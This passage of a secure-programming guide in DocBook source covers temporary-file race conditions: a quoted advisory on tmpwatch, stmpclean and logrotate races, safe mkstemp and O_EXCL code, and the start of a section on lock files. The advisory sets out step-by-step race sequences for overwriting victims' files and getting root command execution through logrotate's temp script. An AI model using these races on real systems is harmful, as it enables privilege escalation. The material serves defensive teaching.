calls, remove the old "decoy" file that has been probed with
|
||
lstat(), and
|
||
let the application of his choice create its own temporary file
|
||
under this
|
||
name. While mkstemp() names are guaranteed to be unique, they
|
||
shouldn't be
|
||
expected to be unpredictable - in most implementations, the name
|
||
is a
|
||
function of process ID and time - so it is possible for the
|
||
attacker to
|
||
guess it and create a decoy in advance. Once the tmpwatch process
|
||
is
|
||
resumed, the file is immediately removed, based on the result of
|
||
earlier lstat() on the old, no longer existing file.
|
||
|
||
While this three-component race requires very precise timing, it
|
||
is possible to try a number of times in a single 'tmpwatch' run if
|
||
enough decoy files are created by the attacker. Additionally,
|
||
since
|
||
each step of the attack would result in a corresponding filesystem
|
||
change, it is fairly easy to carefully measure timings and
|
||
coordinate the attack.
|
||
|
||
If the attacker cannot make the application run at the same time
|
||
as 'tmpwatch' - for example, if the application is executed by
|
||
hand by the administrator, or is running from cron - 'tmpwatch'
|
||
itself can be artificially delayed for almost an arbitrary amount
|
||
of time by creating and continuously expending an elaborate
|
||
directory
|
||
structure in /tmp using hard links (to preserve access times of
|
||
files) and running other processes that demand disk access and
|
||
cache space to slow down the process.
|
||
|
||
'Stmpclean' offers additional protection against races by not
|
||
removing
|
||
root-owned files and temporarily dropping privileges when removing
|
||
the file to match the owner of lstat()ed resource. Unfortunately,
|
||
not removing root files is a considerable drawback, and there is
|
||
still
|
||
a potential for a race using carefully crafted hard links to a
|
||
file
|
||
owned by the victim and two concurrent 'stmpclean' processes:
|
||
|
||
- the attacker links /tmp/foo to ~victim/.bash_profile
|
||
- tmpwatch #1 does lstat() on /tmp/foo and setuid victim
|
||
- tmpwatch #2 does lstat() on /tmp/foo and setuid victim
|
||
- tmpwatch #1 does unlink("/tmp/foo")
|
||
- victim application creates /tmp/foo at uid==victim
|
||
- tmpwatch #2 does unlink("/tmp/foo") and succeeds
|
||
- the attacker creates /tmp/foo
|
||
- victim application proceeds
|
||
|
||
On certain systems such as Owl Linux, the attack will be not
|
||
possible
|
||
due to hardlink limits imposed on sticky-bit directories.
|
||
|
||
2) suspended processes and 'legitimate' file removal
|
||
|
||
Here, all conventional measures that could be exercised by /tmp
|
||
cleaners
|
||
fail miserably. A vulnerable application can be often delayed or
|
||
suspended
|
||
after mkstemp() / open() - for example, a setuid program can be
|
||
stopped with SIGSTOP and resumed with SIGCONT. If the application
|
||
is
|
||
suspended for long enough, its temporary files are likely to be
|
||
removed. This method requires much less precision, but is also
|
||
more time-consuming and has a more limited scope (interactive
|
||
applications only).
|
||
|
||
Note that it is sometimes possible to delay the execution of
|
||
a daemon - client wait, considerable I/O or CPU loads, and
|
||
subsequent
|
||
mkstemp() calls can be all used to achieve the effect. The
|
||
feasibility and efficiency is low, but the potential issue
|
||
exists. Some client applications that are often left unattended
|
||
and create temporary files - such as mail/news clients, web
|
||
browsers, irc clients, etc - can also be used to compromise
|
||
other accounts on the machine.
|
||
|
||
Not all applications are prone to the problem just because mkstemp()
|
||
is used to create files in /tmp; if the file name is not used to
|
||
perform
|
||
any sensitive operations with some extra privileges afterward (read,
|
||
write, chown, chmod, link/rename, etc), and only the descriptor is
|
||
being used, the application is safe. This practice is often exercised
|
||
by
|
||
programmers who want to avoid leaving dangling temporary files in
|
||
case
|
||
the program is aborted or crashes. Similarly, if the application uses
|
||
temporary files improperly, but does not rely on their contents and
|
||
does
|
||
not attempt to access them with higher privileges, the application is
|
||
secure in that regard.
|
||
|
||
Applications that run with higher privileges and reopen their
|
||
/tmp temporary files for reading or writing, call chown(), chmod() on
|
||
them, rename or link the file to replace some sensitive information,
|
||
and
|
||
so on, are exposed. It is worth mentioning that a popular 'mktemp'
|
||
utility coming from OpenBSD passes only the filename to the
|
||
caller shell script, thus rendering almost all scripts using it
|
||
fundamentally flawed. If the script is being run as a cron job or
|
||
other administrative task, and mktemp is used, the system can be
|
||
likely
|
||
compromised by replacing the file after mktemp and prior to any write
|
||
to the file. In the example quoted in the documentation for
|
||
mktemp(1):
|
||
|
||
TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
|
||
echo "program output" >> $TMPFILE
|
||
|
||
...the attacker would want to replace temporary file right before
|
||
'echo', causing the text "program output" to be appended to a target
|
||
file of his choice using symlinks or hardlinks; or, if it is more
|
||
desirable, he'd spoof file contents to cause the program to
|
||
misbehave.
|
||
|
||
Another example of the problem is a popular logrotate utility,
|
||
coded - ironically - by Erik Troan, one of co-authors of 'tmpwatch'
|
||
itself. The program suffered /tmp races in the past, but later
|
||
switched to mkstemp(). The following sequence is used to handle
|
||
post-rotation shell commands specified in config files:
|
||
|
||
open("/tmp/logrotate.wvpNmP", O_WRONLY|O_CREAT|O_EXCL, 0700) = 6
|
||
...
|
||
write(6, "#!/bin/sh\n\n", 11) = 11
|
||
write(6, "\n\t/bin/kill -HUP `cat /var/lock/"..., 79) = 79
|
||
close(6) = 0
|
||
... fork, etc ...
|
||
execve("/bin/sh", ["sh", "-c", "/bin/sh /tmp/logrotate.wvpNmP" ...
|
||
|
||
Obviously, if the attacker can have /tmp/logrotate.* replaced in
|
||
between mkstemp() (represented as open() syscall above) and the
|
||
point where another process is spawned, a shell interpreter is
|
||
invoked,
|
||
then executes another copy of the shell interpreter (apparent
|
||
programmer's mistake) and finally reads the input file - which is
|
||
a considerable chunk of time - the shell will be called with
|
||
attacker-supplied commands to be executed with root privileges.
|
||
|
||
On Red Hat, logrotate is executed from crontab on a daily basis, in
|
||
a sequence before 'tmpwatch', and the easiest option for the attacker
|
||
is to maintain a still-running tmpwatch process from the previous day
|
||
to exploit the condition. On systems where those programs are not
|
||
executed sequentially - for example, when both programs are listed
|
||
directly in /etc/crontab - the attack requires less precision.
|
||
|
||
|
||
4) Workarounds and fixes:
|
||
=====
|
||
|
||
Recommended immediate workaround is to discontinue the use of
|
||
'tmpwatch'
|
||
or equivalent to sweep /tmp directory if this service is not
|
||
necessary.
|
||
|
||
For applications that rely on TMPDIR or a similar environment
|
||
variable, setting it to a separate, not publicly writable directory
|
||
is often a viable solution. Note that not all applications honor
|
||
this setting.
|
||
|
||
In terms of a permanent solution, two different attack vectors have
|
||
to be addressed, as discussed in section 3:
|
||
|
||
1) unlink() race
|
||
|
||
The proper way to remove files in sticky-bit directories while
|
||
minimizing the risk is as follows:
|
||
|
||
a) lstat() the file to be removed
|
||
b) if owned by root, do not remove
|
||
c) if st_nlink > 1, do not remove
|
||
d) if owned by user, temporarily change privileges to this user
|
||
e) attempt unlink()
|
||
f) if failed, warn about a possible race condition
|
||
g) switch privileges back to root
|
||
|
||
With the exception of step c, this is implemented in 'stmpclean'.
|
||
Unfortunately, step c is crucial on systems that do not have
|
||
restricted /tmp kernel patches from Openwall
|
||
(http://www.openwall.com),
|
||
otherwise, there is a potential for fooling the algorithm by
|
||
supplying
|
||
a hard link to a file owned by the victim, as discussed in section
|
||
3.
|
||
|
||
This approach has several drawbacks - such as the fact root-owned
|
||
files
|
||
will not be removed. Other solution is to modify applications that
|
||
generate filenames on their own, and to modify mkstemp(), to
|
||
generate
|
||
names that are not only unique, but not feasible to predict.
|
||
|
||
Another suggestion is to implement a funlink() capability in the
|
||
kernel
|
||
of the operating system in question, to allow race-free file
|
||
removal,
|
||
thus removing the non-root ownership requirement for the method
|
||
described
|
||
above, and simplifying the approach. A skeleton patch to implement
|
||
funlink() semantics and make sure the file being removed is the
|
||
file
|
||
opened and fstat()ed previously is available at:
|
||
http://lcamtuf.coredump.cx/soft/linux-2.4-funlink.diff (this and
|
||
other patches are not endorsed by RAZOR in any way).
|
||
|
||
2) suspended process and 'legitimate' file removal
|
||
|
||
This issue is fairly difficult to address. The most basic idea is
|
||
to use a special naming scheme for temporary files to avoid
|
||
deletion -
|
||
unfortunately, this seems to defeat the purpose of using
|
||
tmpwatch-alike
|
||
solutions in the first place.
|
||
|
||
An alternative approach, which is to enforce separate temporary
|
||
directories for certain applications, either process-, session- or
|
||
uid-
|
||
based, is generally fairly controversial, and raises some
|
||
concerns.
|
||
Advisory separation is generally acceptable, but there are a
|
||
number of
|
||
applications that do not accept TMPDIR setting, and a widespread
|
||
practice
|
||
of using /tmp in in-house applications. Mandatory separation
|
||
(kernel
|
||
modification) raises compatibility concerns and is generally
|
||
approached
|
||
with skepticism - no implementation has become particularly
|
||
popular.
|
||
|
||
Ideally, implementators should carefully audit their sources. It is
|
||
recommended for privileged applications to use private temporary
|
||
directories for sensitive files, if possible; if using /tmp is
|
||
necessary,
|
||
extra caution has to be exercised to avoid referencing the file by
|
||
name.
|
||
Note that comparing the descriptor and a reopened file to verify
|
||
inode
|
||
numbers, creation times or file ownership is not sufficient - please
|
||
refer
|
||
to "Symlinks and Cryogenic Sleep" by Olaf Kirch, available at
|
||
http://www.opennet.ru/base/audit/17.txt.html .
|
||
|
||
It's worth noticing that 'tmpwatch' offers a -s option, which causes
|
||
the
|
||
program to run the 'fuser' command to prevent removal of files that
|
||
are
|
||
currently open. At first sight, this could be an effective way to
|
||
solve the
|
||
problem. Unfortunately, this is not true, since many applications
|
||
close the
|
||
file for a period of time before reopening (including logrotate and
|
||
mktemp(1)).
|
||
|
||
|
||
5) Credits and thanks
|
||
=====
|
||
|
||
Thanks to Solar Designer for interesting discussions on the subject,
|
||
to Matt Power for useful feedback, and to RAZOR team in general for
|
||
making
|
||
this publication possible.
|
||
|
||
-->
|
||
|
||
<para>
|
||
The general problem when creating files in these shared directories is that
|
||
you must guarantee that the filename you plan to use doesn't already
|
||
exist at time of creation, and atomically create the file.
|
||
Checking ``before'' you create the file doesn't work, because after the check
|
||
occurs, but before creation, another process can create that file with
|
||
that filename.
|
||
Using an ``unpredictable'' or ``unique'' filename doesn't work in
|
||
general, because another process can often repeatedly guess until it succeeds.
|
||
Once you create the file atomically, you must alway use the returned
|
||
file descriptor
|
||
(or file stream, if created from the file descriptor using routines
|
||
like fdopen()).
|
||
You must never re-open the file, or use any operations that use the
|
||
filename as a parameter - always use the file descriptor or
|
||
associated stream.
|
||
Otherwise, the tmpwatch race issues noted above will cause problems.
|
||
You can't even create the file, close it, and re-open it, even if the
|
||
permissions limit who can open it.
|
||
Note that comparing the descriptor and a reopened file to verify inode
|
||
numbers, creation times or file ownership is not sufficient - please refer
|
||
to "Symlinks and Cryogenic Sleep" by Olaf Kirch.
|
||
<!--
|
||
http://www.opennet.ru/base/audit/17.txt.html .
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
Fundamentally, to create a temporary file in a shared (sticky) directory,
|
||
you must repetitively: (1) create a ``random'' filename, (2) open it using
|
||
O_CREAT | O_EXCL and very narrow permissions (which atomically creates the
|
||
file and fails if it's not created),
|
||
and (3) stop repeating when the open succeeds.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
According to the 1997 ``Single Unix Specification'', the preferred
|
||
method for creating an arbitrary temporary file
|
||
(using the C interface) is tmpfile(3).
|
||
The tmpfile(3) function creates a temporary file
|
||
and opens a corresponding stream, returning that stream (or NULL if it didn't).
|
||
Unfortunately, the specification doesn't make any
|
||
guarantees that the file will be created securely.
|
||
In earlier versions of this book, I stated that I was concerned because
|
||
I could not assure myself that all implementations do this securely.
|
||
I've since found that older System V systems
|
||
have an insecure implementation of tmpfile(3) (as well as insecure
|
||
implementations of tmpnam(3) and tempnam(3)), so on at least some systems
|
||
it's absolutely useless.
|
||
<!-- http://www.gsp.com/cgi-bin/man.cgi?section=3&topic=tmpfile which
|
||
shows tmpfile(3) of BSD, November 17, 1993. -->
|
||
Library implementations of tmpfile(3) should securely create such files,
|
||
of course, but users don't always realize that their system libraries
|
||
have this security flaw, and sometimes they can't do anything about it.
|
||
</para>
|
||
|
||
<para>
|
||
Kris Kennaway recommends using mkstemp(3) for making temporary files
|
||
in general.
|
||
His rationale is that you should use well-known library functions to perform
|
||
this task instead of rolling your own functions, and that this function
|
||
has well-known semantics.
|
||
This is certainly a reasonable position.
|
||
I would add that, if you use mkstemp(3), be sure to use umask(2) to limit
|
||
the resulting temporary file permissions to only the owner.
|
||
This is because
|
||
some implementations of mkstemp(3) (basically older ones) make such
|
||
files readable and writable by all,
|
||
creating a condition in which an attacker can read or
|
||
write private data in this directory.
|
||
A minor nuisance is that mkstemp(3) doesn't directly support the
|
||
environment variables TMP or TMPDIR (as discussed below), so
|
||
if you want to support them you have to add code to do so.
|
||
Here's a program in C that demonstrates how to use mkstemp(3)
|
||
for this purpose, both directly and when adding support for TMP and TMPDIR:
|
||
|
||
<programlisting width=72>
|
||
<![CDATA[
|
||
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <sys/types.h>
|
||
#include <sys/stat.h>
|
||
|
||
void failure(msg) {
|
||
fprintf(stderr, "%s\n", msg);
|
||
exit(1);
|
||
}
|
||
|
||
/*
|
||
* Given a "pattern" for a temporary filename
|
||
* (starting with the directory location and ending in XXXXXX),
|
||
* create the file and return it.
|
||
* This routines unlinks the file, so normally it won't appear in
|
||
* a directory listing.
|
||
* The pattern will be changed to show the final filename.
|
||
*/
|
||
|
||
FILE *create_tempfile(char *temp_filename_pattern)
|
||
{
|
||
int temp_fd;
|
||
mode_t old_mode;
|
||
FILE *temp_file;
|
||
|
||
old_mode = umask(077); /* Create file with restrictive permissions */
|
||
temp_fd = mkstemp(temp_filename_pattern);
|
||
(void) umask(old_mode);
|
||
if (temp_fd == -1) {
|
||
failure("Couldn't open temporary file");
|
||
}
|
||
if (!(temp_file = fdopen(temp_fd, "w+b"))) {
|
||
failure("Couldn't create temporary file's file descriptor");
|
||
}
|
||
if (unlink(temp_filename_pattern) == -1) {
|
||
failure("Couldn't unlink temporary file");
|
||
}
|
||
return temp_file;
|
||
}
|
||
|
||
|
||
/*
|
||
* Given a "tag" (a relative filename ending in XXXXXX),
|
||
* create a temporary file using the tag. The file will be created
|
||
* in the directory specified in the environment variables
|
||
* TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
|
||
* it will be created in /tmp. Note that root (and su'd to root)
|
||
* _will_ use TMPDIR or TMP, if defined.
|
||
*
|
||
*/
|
||
FILE *smart_create_tempfile(char *tag)
|
||
{
|
||
char *tmpdir = NULL;
|
||
char *pattern;
|
||
FILE *result;
|
||
|
||
if ((getuid()==geteuid()) && (getgid()==getegid())) {
|
||
if (! ((tmpdir=getenv("TMPDIR")))) {
|
||
tmpdir=getenv("TMP");
|
||
}
|
||
}
|
||
if (!tmpdir) {tmpdir = "/tmp";}
|
||
|
||
pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
|
||
if (!pattern) {
|
||
failure("Could not malloc tempfile pattern");
|
||
}
|
||
strcpy(pattern, tmpdir);
|
||
strcat(pattern, "/");
|
||
strcat(pattern, tag);
|
||
result = create_tempfile(pattern);
|
||
free(pattern);
|
||
return result;
|
||
}
|
||
|
||
|
||
|
||
main() {
|
||
int c;
|
||
FILE *demo_temp_file1;
|
||
FILE *demo_temp_file2;
|
||
char demo_temp_filename1[] = "/tmp/demoXXXXXX";
|
||
char demo_temp_filename2[] = "second-demoXXXXXX";
|
||
|
||
demo_temp_file1 = create_tempfile(demo_temp_filename1);
|
||
demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
|
||
fprintf(demo_temp_file2, "This is a test.\n");
|
||
printf("Printing temporary file contents:\n");
|
||
rewind(demo_temp_file2);
|
||
while ( (c=fgetc(demo_temp_file2)) != EOF) {
|
||
putchar(c);
|
||
}
|
||
putchar('\n');
|
||
printf("Exiting; you'll notice that there are no temporary files on exit.\n");
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Kennaway states that if you can't use mkstemp(3),
|
||
then make yourself a directory using mkdtemp(3), which is protected
|
||
from the outside world.
|
||
However, as Michal Zalewski notes, this is a bad idea if there are
|
||
tmp cleaners in use; instead, use a directory inside the user's HOME.
|
||
Finally, if you really have to use the insecure mktemp(3), use lots of
|
||
X's - he suggests 10 (if your libc allows it) so that the filename can't
|
||
easily be guessed (using only 6 X's means that 5 are taken up by the
|
||
PID, leaving only one random character and allowing an attacker to
|
||
mount an easy race condition).
|
||
Note that this is fundamentally insecure, so you should normally not do this.
|
||
I add that you should avoid tmpnam(3) as well -
|
||
some of its uses aren't reliable when threads are present, and
|
||
it doesn't guarantee that it will work correctly after
|
||
TMP_MAX uses (yet most practical uses must be inside a loop).
|
||
</para>
|
||
|
||
<para>
|
||
In general, you should avoid using the insecure functions
|
||
such as mktemp(3) or tmpnam(3), unless you take specific measures to
|
||
counter their insecurities or test for a secure library implementation
|
||
as part of your installation routines.
|
||
If you ever want to make a file in /tmp or a world-writable directory
|
||
(or group-writable, if you don't trust the group) and don't want to
|
||
use mk*temp() (e.g. you intend for the file to be predictably named),
|
||
then <emphasis>always</emphasis> use the O_CREAT and O_EXCL flags to
|
||
open() and <emphasis>check the return value</emphasis>.
|
||
If you fail the open() call, then recover gracefully (e.g. exit).
|
||
<!-- Kennaway mentioned O_EXCL, but forgot O_CREAT -->
|
||
</para>
|
||
|
||
<para>
|
||
The GNOME programming guidelines recommend the following C code when
|
||
creating filesystem objects in shared (temporary) directories
|
||
to securely open temporary files [Quintero 2000]:
|
||
<programlisting width="68">
|
||
char *filename;
|
||
int fd;
|
||
|
||
do {
|
||
filename = tempnam (NULL, "foo");
|
||
fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
|
||
free (filename);
|
||
} while (fd == -1);
|
||
</programlisting>
|
||
Note that, although the insecure function tempnam(3) is being used, it
|
||
is wrapped inside a loop using O_CREAT and O_EXCL to counteract its
|
||
security weaknesses, so this use is okay.
|
||
Note that you need to free() the filename.
|
||
You should close() and unlink() the file after you are done.
|
||
If you want to use the Standard C I/O library,
|
||
you can use fdopen() with mode "w+b"
|
||
to transform the file descriptor into a FILE *.
|
||
Note that this approach won't work over
|
||
NFS version 2 (v2) systems, because older
|
||
NFS doesn't correctly support O_EXCL.
|
||
Note that one minor disadvantage to this approach is that, since
|
||
tempnam can be used insecurely, various compilers and security scanners
|
||
may give you spurious warnings about its use.
|
||
This isn't a problem with mkstemp(3).
|
||
<!-- They also say you can use tmpfile() to do it in one step; I want
|
||
to verify this before saying so. I'm concerned that some
|
||
implementations may not "do it correctly", and it's better to
|
||
re-implement than be insecure. -->
|
||
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
|
||
</para>
|
||
|
||
<para>
|
||
If you need a temporary file in a shell script, you're probably
|
||
best off using pipes, using a local directory (e.g., something inside the
|
||
user's home directory), or in some cases using the current directory.
|
||
That way, there's no sharing unless the user permits it.
|
||
If you really want/need the temporary file
|
||
to be in a shared directory like /tmp, do
|
||
<emphasis>not</emphasis> use the traditional shell
|
||
technique of using the process id in a template and just creating the file
|
||
using normal operations like ">".
|
||
Shell scripts can use "$$" to indicate the PID, but the
|
||
PID can be easily determined or guessed by an attacker,
|
||
who can then pre-create files or links with the same name.
|
||
Thus the following "typical" shell script is <emphasis>unsafe</emphasis>:
|
||
<programlisting width="72">
|
||
<![CDATA[
|
||
echo "This is a test" > /tmp/test$$ # DON'T DO THIS.
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
If you need a temporary file or directory
|
||
in a shell script, and you want it in /tmp,
|
||
a solution sometimes suggested is to use
|
||
mktemp(1), which is intended for use in shell scripts
|
||
(note that mktemp(1) and mktemp(3) are different things).
|
||
However, as Michal Zalewski notes, this is insecure in many environments
|
||
that run tmp cleaners;
|
||
the problem is that when a privileged program sweeps through a temporary
|
||
directory, it will probably expose a race condition.
|
||
Even if this weren't true, I do not recommend using shell scripts that
|
||
create temporary files in shared directories;
|
||
creating such files in private directories or using pipes instead is
|
||
generally preferable, even if you're sure your tmpwatch program is okay
|
||
(or that you have no local users).
|
||
If you must use mktemp(1), note that
|
||
mktemp(1) takes a template, then
|
||
creates a file or directory using O_EXCL and returns the resulting name;
|
||
thus, mktemp(1) won't work on NFS version 2 filesystems.
|
||
Here are some examples of correct use of mktemp(1) in Bourne shell scripts;
|
||
these examples are straight from the mktemp(1) man page:
|
||
<programlisting width="72">
|
||
<![CDATA[
|
||
# Simple use of mktemp(1), where the script should quit
|
||
# if it can't get a safe temporary file.
|
||
# Note that this will be INSECURE on many systems, since they use
|
||
# tmpwatch-like programs that will erase "old" files and expose race
|
||
# conditions.
|
||
|
||
TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
|
||
echo "program output" >> $TMPFILE
|
||
|
||
# Simple example, if you want to catch the error:
|
||
|
||
TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
|
||
if [ $? -ne 0 ]; then
|
||
echo "$0: Can't create temp file, exiting..."
|
||
exit 1
|
||
fi
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Perl programmers should use File::Temp, which tries to
|
||
provide a cross-platform means of securely creating temporary files.
|
||
However, read the documentation carefully on how to use it properly first;
|
||
it includes interfaces to unsafe functions as well.
|
||
I suggest explicitly setting its safe_level to HIGH; this will invoke
|
||
additional security checks.
|
||
<ulink url="http://search.cpan.org/author/JHI/perl-5.8.0/lib/File/Temp.pm">
|
||
The Perl 5.8 documentation of File::Temp is available on-line</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Don't reuse a temporary filename (i.e. remove and recreate it),
|
||
no matter how you obtained the ``secure'' temporary filename in the
|
||
first place.
|
||
An attacker can observe the original filename
|
||
and hijack it before you recreate it the second time.
|
||
And of course, always use appropriate file permissions.
|
||
For example, only allow world/group access
|
||
if you need the world or a group to access the file, otherwise
|
||
keep it mode 0600 (i.e., only the owner can read or write it).
|
||
</para>
|
||
|
||
<para>
|
||
Clean up after yourself, either by using an exit handler, or making
|
||
use of UNIX filesystem semantics and unlink()ing the file immediately
|
||
after creation so the directory entry goes away but the file itself
|
||
remains accessible until the last file descriptor pointing to it is
|
||
closed. You can then continue to access it within your program by
|
||
passing around the file descriptor.
|
||
Unlinking the file has a lot of advantages for code maintenance:
|
||
the file is automatically deleted, no matter how your program crashes.
|
||
It also decreases the likelihood that a maintainer will insecurely
|
||
use the filename (they need to use the file descriptor instead).
|
||
The one minor problem with immediate unlinking is that it makes it slightly
|
||
harder for administrators to see how disk space is being used, since
|
||
they can't simply look at the file system by name.
|
||
</para>
|
||
|
||
<para>
|
||
You might consider ensuring that your code for Unix-like systems
|
||
respects the environment variables TMP or TMPDIR
|
||
if the provider of these variable values is trusted.
|
||
By doing so, you make it possible for users to move their temporary
|
||
files into an unshared directory (and eliminating the problems discussed here),
|
||
such as a subdirectory inside their home directory.
|
||
Recent versions of Bastille can set these variables to reduce the sharing
|
||
between users.
|
||
Unfortunately, many users set TMP or TMPDIR to a shared directory
|
||
(say /tmp), so your secure program must still
|
||
correctly create temporary files even if these environment variables
|
||
are set.
|
||
This is one advantage of the GNOME approach, since at least on some
|
||
systems tempnam(3) automatically uses TMPDIR, while
|
||
the mkstemp(3) approach requires more code to do this.
|
||
Please don't create yet more environment variables for temporary directories
|
||
(such as TEMP), and in particular don't create a different environment
|
||
name for each application (e.g., don't use "MYAPP_TEMP").
|
||
Doing so greatly complicates managing systems,
|
||
and users wanting a special temporary directory for a specific
|
||
application can just set the environment variable specially
|
||
when running that particular application.
|
||
Of course, if these environment variables might have been set by an
|
||
untrusted source, you should ignore them - which you'll do anyway
|
||
if you follow the advice in
|
||
<xref linkend="env-var-solution">.
|
||
</para>
|
||
|
||
<para>
|
||
These techniques don't work if the temporary directory is remotely
|
||
mounted using NFS version 2 (NFSv2), because NFSv2 doesn't properly
|
||
support O_EXCL.
|
||
See <xref linkend="locking-using-files"> for more information.
|
||
NFS version 3 and later properly support O_EXCL; the simple solution
|
||
is to ensure that temporary directories are either local or, if mounted
|
||
using NFS, mounted using NFS version 3 or later.
|
||
There is a technique for safely creating temporary files on NFS v2,
|
||
involving the use of link(2) and stat(2), but it's complex; see
|
||
<xref linkend="locking-using-files"> which has more information about this.
|
||
</para>
|
||
|
||
<para>
|
||
As an aside, it's worth noting that
|
||
FreeBSD has recently changed the mk*temp() family to get rid of
|
||
the PID component of the filename and replace the entire thing with
|
||
base-62 encoded randomness. This drastically raises the number of
|
||
possible temporary files for the "default" usage of 6 X's, meaning
|
||
that even mktemp(3) with 6 X's is reasonably (probabilistically) secure
|
||
against guessing, except under very frequent usage.
|
||
However, if you also follow the guidance here, you'll eliminate the
|
||
problem they're addressing.
|
||
</para>
|
||
|
||
<para>
|
||
Much of this information on temporary files was derived from
|
||
<ulink url="http://lwn.net/2000/1221/a/sec-tmp.php3">Kris Kennaway's
|
||
posting to Bugtraq about temporary files on December 15, 2000</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
I should note that the Openwall Linux patch from
|
||
<ulink url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>
|
||
includes an optional ``temporary file directory'' policy that counters
|
||
many temporary file based attacks.
|
||
The Linux Security Module (LSM) project includes an "owlsm" module
|
||
that implements some of the OpenWall ideas, so
|
||
Linux Kernels with LSM can quickly insert these rules into a running system.
|
||
When enabled, it has two protections:
|
||
<itemizedlist>
|
||
<listitem>
|
||
<para>
|
||
Hard links: Processes may not make hard links to files in certain cases.
|
||
The OpenWall documentation states that
|
||
"Processes may not make hard links to files they do not have write access to."
|
||
In the LSM version, the rules are as follows:
|
||
if both the process' uid and fsuid (usually the same as the euid) is
|
||
is different from the linked-to-file's uid, the
|
||
process uid is not root, and the process lacks the FOWNER capability, then
|
||
the hard link is forbidden.
|
||
The check against the process uid may be dropped someday
|
||
(they are work-arounds for the atd(8) program), at which point the rules
|
||
would be:
|
||
if both the process' fsuid (usually the same as the euid) is
|
||
is different from the linked-to-file's uid and
|
||
and the process lacks the FOWNER capability, then the hard link is forbidden.
|
||
In other words, you can only create hard links to files you own,
|
||
unless you have the FOWNER capability.
|
||
|
||
<!-- do_owlsm_link -->
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
<para>
|
||
Symbolic links (symlinks): Certain symlinks are not followed.
|
||
The original OpenWall documentation states that
|
||
"root processes may not follow symlinks that
|
||
are not owned by root", but the actual rules (from looking at the code)
|
||
are more complicated.
|
||
In the LSM version, if the directory is sticky ("+t" mode, used in shared
|
||
directories like /tmp), symlinks are not followed if the symlink was
|
||
created by anyone other than either the owner of the directory or
|
||
the current process' fsuid (which is usually the effective uid).
|
||
<!-- see do_owlsm_follow_link -->
|
||
</para>
|
||
</listitem>
|
||
</itemizedlist>
|
||
Many systems do not implement this openwall policy, so you can't depend on
|
||
this in general protecting your system.
|
||
However, I encourage using this policy on your own system, and
|
||
please make sure that your application will work when this policy is in place.
|
||
</para>
|
||
|
||
<!-- ???: I need to completely rewrite this race condition section -->
|
||
|
||
<!-- Not quite the right idea:
|
||
You can't even just check to see if the given file is a symbolic link;
|
||
if it's owned by an untrusted user, the user could change this after
|
||
the check.
|
||
One possible tool is the O_NOFOLLOW option for open(), a
|
||
FreeBSD extension also supported by Linux; this option says to not
|
||
follow symbolic links if the link the final portion of the path.
|
||
Unfortunately at this time this option is not portable.
|
||
-->
|
||
|
||
</sect3>
|
||
|
||
|
||
</sect2>
|
||
|
||
|
||
<sect2 id="locking">
|
||
<title>Locking</title>
|
||
|
||
<para>
|
||
There are often situations in which a program must ensure that it has
|
||
exclusive rights to something (e.g., a file, a device, and/or
|
||
existence of a particular server process).
|
||
Any system which locks resources must deal with the standard problems
|
||
of locks, namely, deadlocks (``deadly embraces''), livelocks,
|
||
and releasing ``stuck'' locks if a program doesn't clean up its locks.
|
||
A deadlock can occur if programs are stuck waiting for each other to
|
||
release resources.
|
||
For example, a deadlock would occur if
|
||
process 1 locks resources A and waits for resource B,
|
||
while process 2 locks resource B and waits for resource A.
|
||
Many deadlocks can be prevented by simply requiring all processes
|
||
that lock multiple resources to lock them
|
||
in the same order (e.g., alphabetically by lock name).
|
||
</para>
|
||
|
||
<sect3 id="locking-using-files">
|
||
<title>Using Files as Locks</title>
|
||
|
||
<para>
|
||
On Unix-like systems resource locking has traditionally been done by creating
|
||
a file to indicate a lock, because this is very portable.
|
||
It also makes it easy to ``fix'' stuck locks, because an administrator
|
||
can just look at the filesystem to see what locks have been set.
|
||
Stuck locks can occur because the program failed to clean up after
|
||
itself (e.g., it crashed or malfunctioned) or because the whole system crashed.
|
||
Note that these are ``advisory'' (not ``mandatory'') locks - all processes
|
||
needed the resource must cooperate to use these locks.
|
||
<!-- ??? Discuss various approaches to resolve this, e.g.,
|
||
There are some standard tricks to simplify clean-up for these
|
||
conditions.
|
||
For example, a parent process can set a lock,
|
||
call a child to do the work (make sure only the parent can call the child
|
||
in a way that it can work), and when the child returns the parent releases
|
||
the lock.
|
||
Or, a cron job can look at the locks (which contain a process id); if
|
||
the process isn't alive, it would erase the lock and restart the process.
|
||
Finally, the lock file can be erased as part of system start-up.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
However, there are several traps to avoid.
|
||
First, don't use the technique used by
|
||
very old Unix C programs,
|
||
which is calling creat() or its open() equivalent, the open() mode
|
||
O_WRONLY | O_CREAT | O_TRUNC, with the file mode set to 0 (no permissions).
|
||
For normal users on normal file systems, this works, but
|
||
this approach fails to lock the file when the user has root privileges.
|
||
Root can always perform this operation, even when the file
|
||
already exists.
|
||
In fact, old versions of Unix had this particular problem in the
|
||
old editor ``ed'' -- the symptom was that
|
||
occasionally portions of the password file would be placed in user's files
|
||
[Rochkind 1985, 22]!
|
||
Instead, if you're creating a lock for processes that are on the local
|
||
filesystem, you should use open() with the flags
|
||
O_WRONLY | O_CREAT | O_EXCL (and again, no permissions, so that other
|
||
processes with the same owner won't get the lock).
|
||
Note the use of O_EXCL, which is the official way to
|
||
create ``exclusive'' files; this even works for root on a local filesystem.
|
||
[Rochkind 1985, 27].
|
||
</para>
|
||
|
||
<para>
|
||
